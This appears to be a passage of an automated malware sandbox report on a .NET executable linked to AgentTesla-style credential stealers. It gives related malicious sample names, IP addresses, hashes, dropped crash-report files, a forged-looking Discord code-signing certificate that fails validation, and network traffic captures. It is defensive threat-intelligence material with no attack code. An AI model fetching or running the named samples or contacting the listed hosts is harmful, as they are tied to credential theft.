	Copy#6505270.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	eO2bqORIJb.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	SecuriteInfo.com.Win64.Evo-gen.10533.31255.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	13w4NM6mPa.exe	Get hash	malicious	LummaC	Browse	208.95.112.1
	mdWXrbOxsY.exe	Get hash	malicious	Xehook Stealer	Browse	208.95.112.1
	mdWXrbOxsY.exe	Get hash	malicious	Xehook Stealer	Browse	208.95.112.1
	Syknivkloo.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Shipping Dcuments_CI PKL_HL_.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	transferencia_BBVA_97866456345354678976543425678.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	order & specification.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	CTM REQUEST BIRTHSHIP.doc	Get hash	malicious	AgentTesla	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	eO2bqORIJb.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	SecuriteInfo.com.Win64.Evo-gen.10533.31255.exe	Get hash	malicious	Unknown	Browse	162.159.135.232
	SecuriteInfo.com.Trojan.PWS.Steam.37210.2413.24955.exe	Get hash	malicious	LummaC	Browse	172.67.189.66
	https://jobrad.us1.list-manage.com/track/click?u=9c40c69097d5cc62620fab666&id=4174455835&e=1c8272e83c	Get hash	malicious	Unknown	Browse	104.21.4.152
	avp.msi	Get hash	malicious	Unknown	Browse	104.26.12.205
	https://librospy.com/	Get hash	malicious	Unknown	Browse	172.67.219.113
	13w4NM6mPa.exe	Get hash	malicious	LummaC	Browse	172.67.153.60
	SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe	Get hash	malicious	Amadey, RedLine, RisePro Stealer	Browse	104.26.5.15
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	DTLite1200-2126.exe	Get hash	malicious	Unknown	Browse	104.18.38.233
TUT-ASUS	eO2bqORIJb.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	SecuriteInfo.com.Win64.Evo-gen.10533.31255.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	13w4NM6mPa.exe	Get hash	malicious	LummaC	Browse	208.95.112.1
	mdWXrbOxsY.exe	Get hash	malicious	Xehook Stealer	Browse	208.95.112.1
	mdWXrbOxsY.exe	Get hash	malicious	Xehook Stealer	Browse	208.95.112.1
	Syknivkloo.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Shipping Dcuments_CI PKL_HL_.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	transferencia_BBVA_97866456345354678976543425678.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	order & specification.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	CTM REQUEST BIRTHSHIP.doc	Get hash	malicious	AgentTesla	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	eO2bqORIJb.exe	Get hash	malicious	AgentTesla	Browse	172.67.146.180
	SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exe	Get hash	malicious	PureLog Stealer	Browse	172.67.146.180
	SecuriteInfo.com.Trojan.KillProc2.23108.29569.31585.exe	Get hash	malicious	Unknown	Browse	172.67.146.180
	https://netflixfreeprimeofficle.blogspot.com/	Get hash	malicious	HTMLPhisher	Browse	172.67.146.180
	KZWCMNWmmqi9lvI.exe	Get hash	malicious	AgentTesla	Browse	172.67.146.180
	Payment.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	172.67.146.180
	DOCUMENTS OF OWNERSHIP AND PAYMENT REQUIREMENTS.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	172.67.146.180
	Gcerti Quote.exe	Get hash	malicious	AgentTesla	Browse	172.67.146.180
	Arba Outstanding Statement.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	172.67.146.180
	Shipping Dcuments_CI PKL_HL_.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.146.180

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_cvtres.exe_9cebbb35099493e8eef666c73a0984e3abb1_c414e931_7578e924-5677-4055-9699-9b04449069e8\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2040187430282225
Encrypted:	false
SSDEEP:	192:OOaOvQwChFhK0VYFXa6771TZ+zuiFqZ24IO8DFs:Ba2dChFnVYFXa+dZ+zuiFqY4IO8DF
MD5:	D547B011FE026B1DA6A8BBC6EE0E55AA
SHA1:	8C88F3D6572EE52FD20C9014573E2B0E34767F5A
SHA-256:	27B54146C4A360822642F7F75602F973C8C3FF1947261688A95E6D2CCCCFD15B
SHA-512:	AF2EBEC15262E85BAF5A9FCEEE4F6537EE4F57F7031C790D12E44DFD7BD2864FAC027E0377D59D9C1469C6DDCD8DC836CA680F1F3FD418E75D50E595E60FCFE3
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.7.9.7.8.5.6.3.9.9.8.5.2.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.7.9.7.8.5.6.4.7.6.4.1.4.9.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.7.8.e.9.2.4.-.5.6.7.7.-.4.0.5.5.-.9.6.9.9.-.9.b.0.4.4.4.9.0.6.9.e.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.7.c.2.2.d.b.5.-.b.f.e.7.-.4.4.f.7.-.b.3.f.7.-.9.9.1.4.b.d.6.1.9.2.b.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.v.t.r.e.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.V.T.R.E.S...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.6.0.-.0.0.0.1.-.0.0.1.4.-.3.d.0.f.-.9.7.7.5.1.b.9.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.6.b.8.3.e.b.1.6.4.8.1.c.3.3.4.7.1.9.e.e.d.4.0.6.b.c.5.8.a.3.c.2.b.9.1.0.9.2.3.!.c.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER40FF.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Apr 19 05:36:04 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	263703
Entropy (8bit):	3.8607665647769576
Encrypted:	false
SSDEEP:	3072:XcEeehgHZa4uEqwLTgMyDDQHY52/2AWsVOgeRlql:XcEeeO5a4jTgMyngt/MuOgeRlC
MD5:	0F41BE457201853442AC16B0D1F526E1
SHA1:	DAD08EA7BC9AC45D4967C1062B72E9A28D87AA08
SHA-256:	9C1EECDBE7AA7D57A00AC098441A827A8EAACEE881CC4D40B9B8B83196BDDB81
SHA-512:	73C2A8774203C1402EE635686C89402B562E9270C14EFE6E3CD0DF7E310998A42D1035DCDAEEC28F1D4FB5E8B1B5E6CB7B3F4FE30DC0467A9AE37235A01D7687
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........."f............D...........<...X.......<....(.......$...X..........`.......8...........T............A...............(...........*..............................................................................eJ......T+......GenuineIntel............T.......`....."f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER42E5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8298
Entropy (8bit):	3.6904482122395947
Encrypted:	false
SSDEEP:	192:R6l7wVeJSH686Y6f66gmfZ3W8pDj89bmEsfOCm:R6lXJC686Yy66gmfJWVm3fy
MD5:	0CC0D87EC7732913C490C0B9304150E4
SHA1:	D8AB1F047F5E44916A4793AC26430E3254DC575E
SHA-256:	3589241A59EACB61F4BB87CB57337CA45653FBA5A10B4DFBBB3DD6A1022B7F8E
SHA-512:	D4AD052201FCAE2FBCB14B59DB73EAAE7D59910506E84EE3EBC592D77A7378326B8F59D2DF3D70C56F00D5593FD4218803A1757BACAD2A9EC013B1D4CD7A75EF
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4315.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4699
Entropy (8bit):	4.435000022612458
Encrypted:	false
SSDEEP:	48:cvIwWl8zsWJg77aI9nATXWpW8VYvYm8M4J4SpSPFLu+q8v9SpSepJ3O70d:uIjfsI7JATm7V/J42IuK92x3O70d
MD5:	3A718B7942C53890924E033C58A150D4
SHA1:	8D34217C87ADB9DF3EE15F91FE1572386CAAAD84
SHA-256:	63C2A08D65206A711C3B261E6694074C126E144B16EB1F63380CFDC38800854E
SHA-512:	410D17E992F6CACCFD63F84B1AE909771068D0A5D7FCDCF8EA48B0802E1911CA401FDE5A038C638723F040E71B63DC8D07A6663F3595EABDDD7217CBA9817445
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="286358" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\KjCBSM7Ukv.exe.log

Download File

Process:	C:\Users\user\Desktop\KjCBSM7Ukv.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1031
Entropy (8bit):	5.352154694194798
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeRE4Kx1qE4j:MxHKlYHKh3oPtHo6hAHKzeRHKx1qHj
MD5:	D5F0E53F52AB8FA3BEB3D61F6DD7E35C
SHA1:	1FCEEB1CA14EAABC17D427180A436779E5834096
SHA-256:	6D8230D75A1F0383C58AF007EAFE73519258929DB9D89F1B73E8B461D50DE639
SHA-512:	8F7B192D1ECDA2D142E6DD758426A637D96F5EE1687DDE2E2256EDAB62139754A830A96697601765622413A1F9F85A47C07537C524CF4D206025006C6474BEA9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, Publi

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466265240386583
Encrypted:	false
SSDEEP:	6144:cIXfpi67eLPU9skLmb0b45WSPKaJG8nAgejZMMhA2gX4WABl0uNtdwBCswSbH:hXD945WlLZMM6YFHX+H
MD5:	849F975797998DBAA8EB9251176CDE59
SHA1:	F7DDE9DEB5AE5EEF1F2EB8EC196B98D2D0B04745
SHA-256:	89F432AAED731BE4432BA748179ECDF3106A5F88D55B05F7A68F2974AC7DE79B
SHA-512:	46CC624401AD6BC8E5EA6F1D24E721F3ACC0292795C33C585B849FD5606343C0AC0B8264D4B7AC2C8E8E44E6A12BB1D650A6C3B34B1DAF135AA6BB93D1587F38
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..%x..................................................................................................................................................................................................................................................................................................................................................3L........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.812292739280402
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	KjCBSM7Ukv.exe
File size:	51'480 bytes
MD5:	fe7c4b36fca4fdf53789979a4a09c880
SHA1:	89caf7f3b9f4d7d732ade5593e1958f6f025afa1
SHA256:	1b3711717d430ce33222b97fe8ec692741b7ac8bd9bfb4c2c975ae2f46b37470
SHA512:	e0668f6dfda991ab07870d53ce291f73d48533c44dfed1178c8b98b57c799eb77f19451bc70d09caaf757bf18ef6217b44e7fc626b38c89261dc8920796339f3
SSDEEP:	768:mDrJUAkwf3ppZuBdrm+KiPxWEh9HgPxWEjj4G:8rkwf3ppZRsPxZgPx94G
TLSH:	81331DD14648FF02DA76CFBC28F085122D38FE43DA23859B6309B4D50A72BC756B6DA5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n.!f.....................f.......2... ...@....@.. ....................................`................................

File Icon


Icon Hash:	0f2b69d4d44d330f

Static PE Info

General

Entrypoint:	0x403212
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6621F66E [Fri Apr 19 04:43:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	11/02/2021 00:00:00 08/05/2024 00:59:59
Subject Chain	CN=Discord Inc., OU=Select or enter, O=Discord Inc., L=San Francisco, S=California, C=US, SERIALNUMBER=5128862, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
Version:	3
Thumbprint MD5:	9645B51A067AE4A175AD171CD586719A
Thumbprint SHA-1:	A10EB13B255A9F3BFDA8664182B0F529B649DA3D
Thumbprint SHA-256:	B366D8876954382B0540BD03763ADC9CFF9C9090606B1FF81CF4CDE273152655
Serial:	01E20D5BE0B5190B1DBFDE9BEF380D9A

Entrypoint Preview

Instruction
jmp dword ptr [00403220h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
hlt
xor dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x31c4	0x4c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x62d2	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x7c00	0x4d18
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3220	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1228	0x1400	cae1686a0f9d19fabac7573066bf7237	False	0.5216796875	data	5.21536817702984	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x62d2	0x6400	1dc77eab5fc399c909d4535f34277383	False	0.148125	data	3.464818354883884	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc000	0xc	0x200	9a81cbdb82c16f49f8baf2764bdd610b	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x4160	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.32180851063829785
RT_ICON	0x45d8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.18785178236397748
RT_ICON	0x5690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.17074688796680498
RT_ICON	0x7c48	0x2028	Device independent bitmap graphic, 256 x 512 x 32, image size 0	0.031219630709426627
RT_GROUP_ICON	0x9c80	0x3e	data	0.7903225806451613
RT_VERSION	0x9cce	0x40a	data	0.3781431334622824
RT_MANIFEST	0xa0e8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 19, 2024 07:35:58.522702932 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:58.522794008 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:58.522908926 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:58.535765886 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:58.535815954 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:58.763521910 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:58.763626099 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:58.766539097 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:58.766568899 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:58.766967058 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:58.816773891 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:58.855114937 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:58.900121927 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.048952103 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.048995972 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.049031019 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.049061060 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.049097061 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.049138069 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.049185038 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.049185038 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.049185991 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.049257040 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.059837103 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.059930086 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.059948921 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.060045958 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.060129881 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.060143948 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.060327053 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.060363054 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.060390949 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.060405970 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.060458899 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.060472965 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.061022997 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.061064959 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.061079979 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.061093092 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.061157942 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.061172009 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.061707973 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.061754942 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.061767101 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.061780930 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.061821938 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.061830997 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.061844110 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.061897039 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.062592983 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.062659025 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.062696934 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.062732935 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.062738895 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.062753916 CEST	443	49731	172.67.146.180	192.168.2.4
